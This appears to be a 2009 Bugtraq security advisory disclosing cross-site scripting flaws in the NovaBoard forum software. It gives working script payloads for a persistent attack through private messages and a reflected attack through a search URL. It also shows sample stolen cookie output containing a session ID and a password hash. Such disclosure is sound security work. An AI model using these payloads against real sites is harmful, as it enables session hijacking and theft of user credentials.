NovaBoard <= 1.0.1 / XSS Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: NovaBoard <= 1.0.1 / XSS Vulnerability
- From: Jose Luis <pepeluxx@xxxxxxxxx>
- Date: Tue, 3 Mar 2009 22:26:33 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=ShsIF9SFYY6Vws2Y6mEpD7lwwsxJsWxboSTT5FBrbl8=; b=wyqndbXIdC6wCF+l6apQ6Kyr5juE/7xR5r8bsEfzne4sVlwWECbMaDw1D6+9ahNumK gS6uEeimfmxZNJGHwKOFl9fUdXRyWLnUDQYNo1qEwynDkEMYQPDPPLHN+JPHIO2IQBO1 LFtGcvvJ0+09d9guvSz9p8jRPCrK4HXZBUkLg=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=wcnqRWTtJpflwIbg2naQ5lBMUguKqk96f2c3JWCA2El3I5LlindwB9tSwyX/mf+7hu QEj7IgIfqQAk33STV94MDCN5d6h9ke8Brkby3WB22Gdv9xdWS2pekjXS5v2AapA+seOR +awFsDvSlhTJrATxsn8m9lxJLnu4dZmIx+hgc=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
NovaBoard <= 1.0.1 / XSS Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$ Program: NovaBoard
$ Version: <= 1.0.1
$ File affected: index.php
$ Download: http://www.novaboard.net/
Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org
-- About the program (by the author's page) --
NovaBoard is a free, feature rich community message board software written in
PHP & MySQL that allows you to set up your own forum within minutes.
With a smart modules feature and the ease of creating your own themes you can
style and manipulate your board to look and perform how you want.
NovaBoard makes running a message board a breeze!
-- Bug --
You can inject JS.
-- Exploit --
Persistent XSS:
You can write a message to another user of the forum and inject XSS code:
Message subject:
Message recipient:
Message:
<script>alert(document.cookie)</script>
you can also send the user cookie to another site
Non-persistent XSS:
http://site.com/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=
Response:
If you are an authenticated user you'll see something like this:
PHPSESSID=241092c53c1379df01b743d910f61c62; nova_name=Member;
nova_password=f11d8a080797894ad3e714fa2f849c62
Username and password are stored in the cookie.
If you are not authenticated:
PHPSESSID=241092c53c1379df01b743d910f61c62